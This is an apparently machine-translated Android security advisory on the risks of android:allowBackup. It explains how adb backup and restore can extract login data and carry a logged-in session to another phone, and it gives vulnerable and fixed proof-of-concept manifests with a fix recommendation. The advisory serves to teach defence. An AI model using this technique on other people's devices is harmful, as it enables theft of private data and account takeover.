Security risks of allowBackup in Android attributes

Security risks of allowBackup in Android attributes
1. allowBackup Security Risk Description

Android API Level 8 and later Android systems provide the backup and recovery functions for application data. The switch of this function is determined by AndroidManifest in the application. the allowBackup attribute value in the xml file [1]. The default attribute value is True. When the allowBackup flag is true, you can use adb backup and adb restore to back up and restore application data, which may bring certain security risks.

Android attribute allowBackup security risk is due to adb backup allows anyone who can enable the USB debugging switch to copy application data from the Android mobile phone to peripherals. Once the application data is backed up, all application data can be read by users. adb restore allows users to specify a restored data source (that is, the backup application data) to restore the creation of application data. Therefore, after an application data is backed up, you can install the same application on another Android phone or simulator and restore the backup application data to the device, open the application on the device to restore the status of the backed up application.

Especially for address book applications, once the application supports backup and recovery, attackers can use adb backup and adb restore to restore the newly installed same application to view chat records and other information; for financial payment applications, attackers can use this method to make malicious payments and steal deposits. Therefore, for the sake of security, developers must set the allowBackup flag to false to disable the backup and recovery functions of the application to avoid information leakage and property loss.
 

2. allowBackup security impact Scope

Android API Level 8 and above
 

3. allowBackup security risk details 1) allowBackup risk location:

 

AndroidMannifest. xml file android: allowBackup attributes;
 

2) Prerequisites for triggering allowBackup risks:

The android: allowBackup attribute value in the AndroidMannifest. xml file is not set to false;
 

3) allowBackup risk principle:

When the allowBackup flag value is true, you can use adb backup and adb restore to back up and restore application data;
 

4. allowBackup risk POC

1) if the allowBackup attribute value is not set in the AndroidManifest. xml file and its default value is "true", the application can use the adb command to back up the data of the entire application;
AndroidManifest. xml file content:
 

<?xml version="1.0" encoding="utf-8"?><manifest xmlns:android="http://schemas.android.com/apk/res/android"          package="com.alibaba.jaq.allowbackuppoc"          android:versionCode="1"          android:versionName="1.0">    <uses-sdk android:minSdkVersion="10"/>    <uses-permission android:name="android.permission.READ_PHONE_STATE" />    <application               android:label="@string/app_name">        <activity android:name="LoginActivity"                  android:label="@string/app_name">            <intent-filter>                <action android:name="android.intent.action.MAIN"/>                <category android:name="android.intent.category.LAUNCHER"/>            </intent-filter>        </activity>        <activity android:name=".HomeActivity"/>    </application></manifest>

 

After the POC application is started, the following figure is displayed on the left and right after Logon:

Use the adb command to back up the application data after the application is logged on:
 

 

Use the decryption program Android Backup Extractor [3] written by Nikolay Elenkov to decrypt the Backup file "allowBackup. shows the data (logon user name and password) of the POC application:

On another Android phone, install the POC application and restore the data backed up above to bring the newly installed application to the login status:
 

Before data recovery:
 

Click "recover my data". After the data is restored, restore the data without entering the user name and password. Click the application icon to enter the logon status:
 

 

 

 

2) If the value of allowBackup is set to false in the AndroidManifest. xml file, that is, android: allowBackup = "false", the Android application cannot back up and restore the data of the entire application through the adb command;
AndroidManifest. xml file content:
 

<?xml version="1.0" encoding="utf-8"?><manifest xmlns:android="http://schemas.android.com/apk/res/android"          package="com.alibaba.jaq.allowbackuppoc"          android:versionCode="1"          android:versionName="1.0">    <uses-sdk android:minSdkVersion="10"/>    <uses-permission android:name="android.permission.READ_PHONE_STATE" />    <application            android:allowBackup="false"            android:label="@string/app_name">        <activity android:name="LoginActivity"                  android:label="@string/app_name">            <intent-filter>                <action android:name="android.intent.action.MAIN"/>                <category android:name="android.intent.category.LAUNCHER"/>            </intent-filter>        </activity>        <activity android:name=".HomeActivity"/>    </application></manifest>

 

After the POC application is started, the following figure is displayed on the left and right after Logon:

Use the adb command to back up the application data after the application is logged on:

By decrypting the backup file "allowBackup. AB", as shown in, we can know that the backup data of the POC application is empty, so the backup is unsuccessful:
 

On another Android phone, install the POC application and restore the data backed up above to bring the newly installed application to the login status:
 

Before data recovery:
 

After the data is restored, re-open the application and find that the logon status is not directly displayed:
 

 

 

5. allowBackup risk repair suggestion Alibaba Cloud universal security recommends setting the allowBackup attribute value to false:

For security reasons, we recommend that you disable the application backup function. In the AndroidMenifest. xml file, set the "android: allowBackup" attribute of the corresponding component to "false", as shown in the following example:
 

<application        android:allowBackup="false"        android:label="@string/app_name">    <activity android:name="LoginActivity"              android:label="@string/app_name">        <intent-filter>            <action android:name="android.intent.action.MAIN"/>            <category android:name="android.intent.category.LAUNCHER"/>        </intent-filter>    </activity>    <activity android:name=".HomeActivity"/></application